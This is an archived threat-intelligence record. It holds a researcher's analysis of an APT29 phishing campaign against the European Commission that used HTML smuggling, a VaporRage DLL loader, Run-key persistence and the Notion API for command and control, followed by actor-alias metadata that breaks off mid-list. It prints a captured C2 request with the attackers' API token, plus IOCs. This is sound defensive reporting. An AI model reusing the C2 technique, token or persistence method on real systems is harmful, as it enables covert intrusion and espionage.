{ "id": "c35a28ed-6464-4d00-9987-0e87046e6295", "created_at": "2026-04-06T00:17:05.971066Z", "updated_at": "2026-04-10T03:37:33.21705Z", "deleted_at": null, "sha1_hash": "fb0c003e4f7cb3413a5303e9e563316f5667bb8e", "title": "Sophisticated APT29 Campaign Abuses Notion API to Target the European Commission", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2253691, "plain_text": "Sophisticated APT29 Campaign Abuses Notion API to Target the\r\nEuropean Commission\r\nBy Gianluca Tiepolo\r\nPublished: 2023-03-30 · Archived: 2026-04-05 18:36:22 UTC\r\nResearch by Gianluca Tiepolo\r\nPress enter or click to view image in full size\r\nA map of Russia, as imagined by DALL·E\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 1 of 14\n\nAPT29 is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been involved\r\nin several high-profile cyberattacks against government agencies, NGOs, and IT service providers\r\nThe group has been known to use a range of techniques for their C2 communications, repeatedly\r\nabusing legitimate social media services to blend into normal network traffic and avoid detection\r\nThis analysis documents APT29’s abuse of Notion, the popular note-taking application, which was\r\nused as a C2 channel in a recent campaign targeting the European Commission\r\nAPT29 is a highly sophisticated Advanced Persistent Threat (APT) group that has been attributed to Russia’s\r\nForeign Intelligence Service (SVR). The group has been active since at least 2008 and has been involved in a\r\nwide range of espionage and cyber-attack campaigns targeting governments, military organizations, defense\r\ncontractors, and various industries in the United States, Europe, and Asia.\r\nAPT29 is also known as NOBELIUM (Microsoft), Cozy Bear (Crowdstrike), The Dukes (Kaspersky),\r\nJACKMACKEREL (iDefense), BlueBravo (Recorded Future) and UNC2452 (FireEye).\r\nThe group is known for its subtle and sophisticated tradecraft in stealing geopolitical intelligence: unlike other\r\nRussian state-sponsored groups such as APT28 or Sandworm, APT29 has not been linked to destructive\r\noperations and operates with much more discretion.\r\nThe group has been attributed to a number of high-profile cyberattacks, including:\r\nThe 2016 Democratic National Committee (DNC) hack: APT29 was one of the two Russian groups\r\nresponsible for the cyberattack on the DNC during the 2016 U.S. presidential election. The group gained\r\naccess to the DNC’s email system and stole sensitive information, which was subsequently leaked to the\r\npublic.\r\nThe SolarWinds supply chain attack: APT29 was attributed to the highly sophisticated supply chain\r\nattack against SolarWinds, a leading IT management software provider. The attack allowed the group to\r\ngain access to the systems of several U.S. government agencies, including the Department of Justice, the\r\nDepartment of State, and the Department of Homeland Security.\r\nIn May 2021, it was revealed that APT29 was responsible for a large-scale cyberattack on multiple U.S.\r\ngovernment agencies and private companies, including Microsoft. The group used a compromised email\r\nmarketing system to send spear-phishing emails to over 3,000 individual accounts, resulting in the installation of a\r\nbackdoor that allowed the attackers to gain access to the victims’ networks. The group has also been linked to\r\nother significant cyberattacks, including the theft of COVID-19 research from U.S.-based pharmaceutical\r\ncompanies.\r\nOverall, APT29 is one of the most sophisticated and well-resourced APT groups in the world, and its TTPs are\r\nconstantly evolving and changing.\r\nTactics, Techniques, and Procedures\r\nAPT29 is known for its patient and persistent targeting of its victims, often using multi-stage attacks that take\r\nweeks or even months to complete. Following is a list of the group’s most notable TTPs:\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 2 of 14\n\nSpear-phishing: the group uses highly targeted and convincing spear-phishing emails to gain access to a\r\ntarget’s system. These emails are usually tailored to the recipient’s interests and appear to come from a\r\ntrusted source.\r\nWatering hole attacks: APT29 has also been known to use watering hole attacks, where the group\r\ncompromises a trusted website frequented by the target, and then injects malware into the site to infect\r\nvisitors.\r\nCustom malware: APT29 uses highly customized malware, such as “SeaDuke” and “CosmicDuke,” that\r\nare designed to evade detection and maintain persistence on the target system. The group is also known to\r\nuse well-known tools like “Cobalt Strike” and “PowerShell Empire”.\r\nUse of 0-day exploits: the group is known for its use of zero-day exploits to gain access to target systems.\r\nFor example, APT29 has been known to use exploits for popular software like Microsoft Office and Adobe\r\nFlash.\r\nLiving-off-the-land tactics: APT29 often uses “living-off-the-land” tactics, where the group uses\r\nlegitimate tools and techniques that are already present on the target system to evade detection. This can\r\ninclude tools like PowerShell, Windows Management Instrumentation (WMI), and remote desktop\r\nprotocol (RDP).\r\nIn this particular research, I focused on analyzing APT29’s command-and-control capabilities.\r\nCommand \u0026 Control\r\nThis threat group has a history of using trusted and legitimate cloud services (such as social media services and\r\nGoogle Drive) for their cyber attacks in an attempt to blend into normal network traffic and evade detection.\r\nMalware distributed by APT29 also contains the ability to exfiltrate data over those same C2 channels. For\r\nexample:\r\nThe group’s MiniDuke malware searched for specific tweets that contained URLs to access C2 servers.\r\nAPT29’s CosmicDuke and PolyglotDuke malware also have the ability to use Twitter to obtain C2 URLs,\r\nas well as other social media services like Imgur and Reddit.\r\nAPT29’s HAMMERTOSS backdoor uses GitHub, Twitter, and cloud storage services for C2\r\ncommunication.\r\nAPT29 has also utilized custom encryption methods, such as those found in the group’s SeaDuke malware\r\nwhere a unique fingerprint was generated for the infected host and Base64 encoding and RC4/AES encryption\r\nwas used to layer data during communications with their C2 server. The group has also employed techniques such\r\nas “domain fronting” and TOR obfuscation plugins to create encrypted network tunnels.\r\nUsing social networks for C2 communications is not an entirely new technique: other Russian groups such as\r\nTurla (Venomous Bear) leveraged comments posted to Instagram to obtain the address of its command and\r\ncontrol servers.\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 3 of 14\n\nSource: FireEye, Stealthy Tactics Define a Russian Cyber Threat Group, 2015\r\nAPT29 was spotted using Twitter to control infected machines as early as 2015: in the HAMMERTOSS\r\ncampaign, the group was able to receive commands and send stolen data through the popular social network,\r\nwhich allowed them to evade detection by security solutions that did not monitor social media traffic.\r\nEnvyScout\r\nIn a more recent campaign dating back to June 2021, APT29 targeted Italy diplomatic organizations with a spear\r\nphishing campaign that distributed the EnvyScout backdoor.\r\nPress enter or click to view image in full size\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 4 of 14\n\nC2 communication through Slack\r\nThe backdoor first calls a function to create a custom Slack channel, adding the attacker’s user ID to the newly\r\ncreated channel. The backdoor gets the user name and hostname of the victim host, adds 4 random numbers to\r\nform the name of the channel, and sends an HTTP request with an authorization token to the Slack API. After the\r\nchannel is established, the backdoor enters an infinite loop: it uses the “chat.postMessage” API request to send a\r\nbeacon message to the newly created channel and it receives a response with a list of additional files and\r\npayloads that are downloaded and executed on the target machine.\r\nBeatdrop\r\nIn mid-January 2022, APT29 launched yet another spear phishing campaign targeting a diplomatic entity, which\r\nwas detected and responded to by Mandiant. During the investigation, Mandiant discovered that the malicious\r\nemails were used to distribute the BEATDROP and BOOMMIC downloaders.\r\nBEATDROP is a downloader written in C that leverages Trello for Command-and-Control (C2)\r\ncommunication. Trello is a web-based project management application that allows users to organize tasks and\r\nprojects using customizable boards, lists, and cards.\r\nWhen executed, BEATDROP maps its own copy of ntdll.dll into memory to execute shellcode in its own\r\nprocess. It creates a suspended thread, then enumerates the system for the username, computer name, and IP\r\naddress to create a victim ID. This victim ID is used by BEATDROP to store and retrieve victim payloads from its\r\nC2. Once the victim ID is created, BEATDROP sends an initial request to Trello to determine if the current victim\r\nhas already been compromised. The shellcode payload is then retrieved from Trello and is targeted for each\r\nvictim. Once the payload has been retrieved, it is deleted from Trello.\r\nNotion for C2 Communication\r\nIn October 2022, ESET Research discovered a sample uploaded to VirusTotal that closely resembled what APT29\r\nhad used a few months ago, with the key difference being that it used Notion, a cloud-based note-taking software\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 5 of 14\n\nplatform, for Command-and-Control (C\u0026C) communications.\r\nNotion API can be abused for C2 communications by embedding the commands into the Notion workspace, which\r\nis accessed by the malware as if it were a legitimate user. This misuse of Notion allows the threat actors to evade\r\ndetection and bypass security controls, as the traffic between the malware and the Notion server is likely to be\r\nperceived as legitimate traffic.\r\nESET researchers suspect that the downloader deployed in this particular campaign was designed to gather and\r\nexecute additional malicious payloads, such as Cobalt Strike. The campaign has been analyzed in more detail by\r\nresearchers at Hive Pro and Recorded Future, which identify the sample as the GraphicalNeutrino malware.\r\nAccording to Recorded Future, APT29 utilized a compromised website with a lure text of “Ambassador’s schedule\r\nNovember 2022” to distribute the ZIP file “schedule.zip”, suggesting that the targets of the campaign are related to\r\nembassy staff or an ambassador. GraphicalNeutrino, the malware used in the operation, serves as a loader with\r\nbasic C2 capabilities and employs various anti-analysis techniques to avoid detection, including API unhooking\r\nand sandbox evasion.\r\nPress enter or click to view image in full size\r\nGraphicalNeutrino artifact — 140runtime.dll\r\nAfter establishing persistence, the malware decrypts several strings, including a Notion API key and a database\r\nidentifier, and calculates a unique ID for the victim based on their username and hostname. It then uses Notion’s\r\nAPI for C2 communication to deliver additional payloads to the victim’s machine.\r\nGet Gianluca Tiepolo’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nFor each request to the C2, GraphicalNeutrino parses the JSON-formatted response and searches for a “file”\r\narray; if the array is not empty, then the malware will parse out the URL field, download the file and decrypt it\r\nusing a custom cipher. Once the shellcode is decrypted, it is indirectly spawned in a new thread.\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 6 of 14\n\nA sample response from Notion C2\r\nThe use of diplomatic lures during times of heightened geopolitical tensions, such as the ongoing war in Ukraine,\r\nis likely to be effective for Russian APT groups, given the potential impact of information gathered from\r\ncompromised entities or individuals on Russian foreign policy and strategic decision-making processes. It is\r\nperhaps for this reason that APT29 adopted the same tactics — in particular the stealthy C2 communication\r\nthrough Notion — for its next big campaign, this time targeting the European Commission.\r\nAttack against the European Commission\r\nIn this final section of the blog post, I’m dissecting a previously undisclosed campaign attributed to APT29 which\r\ntargeted the European Commission. The previous introduction to the group’s TTPs and campaigns will hopefully\r\nbe beneficial to the reader, as this attack shares quite a few similarities with the GraphicalNeutrino campaign that\r\nwas exposed by Recorded Future.\r\nInitial Access\r\nBeginning mid-February 2023, a spear phishing campaign targeted a number of email addresses related to\r\nmembers of the European Commission. The attack involved the distribution of a malicious .iso image that\r\ncontained a new sample of the VaporRage downloader. Once executed, the malware was observed exploiting the\r\nNotion API to deploy Cobalt Strike beacons.\r\nPress enter or click to view image in full size\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 7 of 14\n\nExecution flow for the attack targeting the European Commission\r\nThe first phishing email, sent on the 13th February 2023, masqueraded as an administrative notice related to\r\ndocuments available to download from eTrustEx, a web based exchange platform that ensures secure transmission\r\nof documents between members of the Commission. The decoy emails are written in English and were delivered\r\nto an extremely targeted number of key people that use the eTrustEx platform.\r\nPress enter or click to view image in full size\r\nLure email delivered to the European Commission\r\nIn addition, I noticed that in different samples of the email, the senders are probably compromised email accounts\r\nbelonging to legitimate government organizations. This could lead victims to believe that the emails came from\r\nreliable partners, making it more likely for recipients to click on the links.\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 8 of 14\n\nWhen the link is opened, the victim is redirected to a malicious HTML page hosted at\r\nhxxps://literaturaelsalvador[.]com/Instructions.html which makes use of a technique known as HTML\r\nSmuggling to download an ISO image to the target system. I believe that this domain is not actor-owned but has\r\nbeen compromised, which aligns with previous APT29 activity.\r\nPress enter or click to view image in full size\r\nLure website\r\nThe ISO file is set to auto-download when the website is visited by the victim; this is achieved through the\r\nfollowing JavaScript code. The contents of Instructions.iso is stored in the d variable.\r\nPress enter or click to view image in full size\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 9 of 14\n\nJS Code which downloads the first-stage payload\r\nExecution\r\nOnce the file has been written to disk, when a user double-clicks on it in Windows 10 or later, the image is\r\nmounted and the folder contents is displayed in Windows Explorer. The ISO contains two files — a Windows\r\nshortcut file ( Instructions.lnk ) and a malicious DLL ( BugSplatRc64.dll ).\r\nIf the user clicks on the LNK file, the following command runs, unintentionally triggering the execution of the\r\nmalicious DLL.\r\nPress enter or click to view image in full size\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 10 of 14\n\nExecution of the malicious DLL\r\nUsing LNK shortcuts to execute malicious DLLs is a technique that has been associated to APT29 in a number of\r\ncampaigns. In this particular scenario, I recognized the sample as VaporRage, a downloader that has been used by\r\nAPT29 since 2021.\r\nPersistence\r\nWhen executed with the InitiateDs export, VaporRage first runs a few reconnaissance commands and generates\r\na host-id by hex-encoding the DNS domain and username. Then, it creates a copy of itself at:\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\DsDiBacks\\BugSplatRc64.dll\r\nPress enter or click to view image in full size\r\nVaporRage creates a copy of itself\r\nVaporRage then establishes persistence on the compromised system by creating a registry run key located at:\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DsDiBacks .\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 11 of 14\n\nPress enter or click to view image in full size\r\nVaporRage establishes persistence through a registry key\r\nCommand and Control\r\nAs I anticipated at the start of this post, the VaporRage sample delivered in the execution chain leverages its\r\ncommand-and-control by communicating over HTTPS using Notion APIs. Notion’s database feature is also used\r\nto store victim information and stage further payloads for download.\r\nPress enter or click to view image in full size\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 12 of 14\n\nPCAP collected during C2 communication\r\nBased on my observations, this VaporRage sample periodically executes a POST request to the Notion API to\r\ncheck the availability of a second-stage malware payload, which is then retrieved and executed in memory. In\r\nthis particular campaign, APT29 used VaporRage to distribute Cobalt Strike beacons to further establish a\r\nfoothold within the environment.\r\nFollowing is a sample POST request towards api.notion.com (104[.]18.42.99):\r\nPOST /v1/databases/37089abc0926463182bb5343bce252cc/query HTTP/1.1\r\ncontent-type: application/json\r\naccept: application/json\r\nnotion-version: 2022-06-28\r\nauthorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.19\r\nHost: api.notion.com\r\nContent-Length: 79\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n {\"filter\":{\"property\":\"Name\",\"rich_text\":{\"equals\":\"VKoMr3830\"}},\"page_size\":1}\r\nThis technique exemplifies APT29’s ongoing attempts to obscure its actions and maintain continuous access to\r\ntarget systems. This has been documented thoroughly by Mandiant, who have described APT29 using a variety of\r\ntechniques, including scheduled tasks, run keys, malicious certificates, and in-memory backdoors, sometimes\r\nutilizing multiple methods for each target.\r\nOverall, the use of cloud services such as Trello and Notion for C2 communications not only provides a threat\r\nactor with increased capabilities for evasion of network security controls, but also increases resilience to law\r\nenforcement takedowns: social media and cloud services are often hosted on multiple servers and locations,\r\nmaking it more difficult for authorities to take down the entire platform. This means that the threat actor can\r\ncontinue to use the platform for C2 communications even if some servers are taken down. These advantages make\r\nit an attractive option for threat groups such as APT29 to conduct their malicious activities.\r\nConclusions\r\nThe range of tactics, techniques, and procedures (TTPs) used by APT29 in this campaign supports the conclusion\r\nthat their objective is to establish numerous means of long-term access to facilitate espionage-related intelligence\r\ngathering within the targeted government entities’ victim networks. Nations that have a connection to the Ukraine\r\ncrisis, specifically those with significant geopolitical, economic, or military ties to Russia or Ukraine, face a\r\nheightened risk of being targeted by APT29.\r\nThis threat group has shown an impressive ability to adapt swiftly during their operations. They use innovative\r\nand unique methods to circumvent detection and authentication requirements in their target environments. In\r\ntheir recent operations, the group has demonstrated a deep understanding of operational security, enabling them to\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 13 of 14\n\nmove seamlessly between on-premises and cloud resources with minimal use of malware. These factors,\r\ncombined with their advanced malware development skills, long history of operations, and extended time on\r\ntargets, indicate that APT29 is a well-funded and exceptionally sophisticated actor and will definitely continue to\r\nbe a threat during 2023.\r\nIOCs\r\nFollowing is a list of indicators associated to this campaign.\r\nDomains\r\nhxxps://literaturaelsalvador[.]com/instructions.html\r\nhxxps://api[.]notion[.]com/v1/databases/37089abc0926463182bb5343bce252cc/query\r\nIPs\r\n108[.]167.180.186\r\n104[.]18.42.99\r\nFiles — SHA256\r\n21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354 (Instructions.iso)\r\ne957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98 (BugSplatRc64.dll)\r\nAbout the Author — Gianluca Tiepolo\r\nI’m a cybersecurity researcher who specializes in digital forensics and incident response for the\r\ntelecommunications industry. Over the past 12 years, by working as a consultant I have performed forensic\r\nanalysis, threat hunting, incident response, and Cyber Threat Intelligence analysis for dozens of organizations,\r\nincluding several Fortune® 100 companies. In 2013, I co-founded the startup Sixth Sense Solutions, which\r\ndeveloped AI-based antifraud solutions.\r\nToday, I work as a Cyber Threat Intelligence (CTI) Team Lead for Accenture Security.\r\nI love writing and sharing my knowledge: in 2016 I authored the book “Getting Started with RethinkDB”, and in\r\n2022 I wrote “iOS Forensics for Investigators”, both published by Packt Publishing.\r\nSource: https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58" ], "report_names": [ "sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", 